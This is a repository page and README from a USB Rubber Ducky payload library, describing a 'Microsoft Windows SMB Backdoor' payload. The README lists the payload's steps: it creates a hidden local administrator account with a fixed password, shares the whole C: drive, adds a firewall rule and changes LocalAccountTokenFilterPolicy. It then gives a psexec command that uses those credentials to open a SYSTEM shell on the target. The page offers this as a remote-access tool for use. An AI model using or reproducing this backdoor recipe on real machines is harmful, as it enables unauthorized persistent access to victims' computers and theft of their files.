usbrubberducky-payloads/payloads/library/remote_access/win_smb-backdoor
TW-D 7d4a6ebf55
Add "Microsoft Windows" SMB Backdoor
1) Adds a user account (RD_User:RD_P@ssW0rD).
2) Adds this local user to local administrator group.
3) Shares "C:" directory (RD_SHARE).
4) Adds a rule to the firewall.
5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
6) Hides this user account.
2022-08-09 03:42:05 -04:00
..
README.md Add "Microsoft Windows" SMB Backdoor 2022-08-09 03:42:05 -04:00
payload.txt Add "Microsoft Windows" SMB Backdoor 2022-08-09 03:42:05 -04:00

README.md

"Microsoft Windows" SMB Backdoor

  • Title: "Microsoft Windows" SMB Backdoor
  • Author: TW-D
  • Version: 1.0
  • Target: Microsoft Windows
  • Category: Remote Access

Description

  1. Adds a user account (RD_User:RD_P@ssW0rD).
  2. Adds this local user to local administrator group.
  3. Shares "C:" directory (RD_SHARE).
  4. Adds a rule to the firewall.
  5. Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
  6. Hides this user account.

Exploitation

The connection identifiers will be those defined by the values : RD_User and RD_P@ssW0rD.

hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./RD_User:RD_P@ssW0rD@<TARGET>
C:\WINDOWS\system32> whoami
nt authority\system

The connection identifiers and the share name will be those defined by the values : RD_SHARE, RD_User and RD_P@ssW0rD.

smb://<TARGET>/RD_SHARE/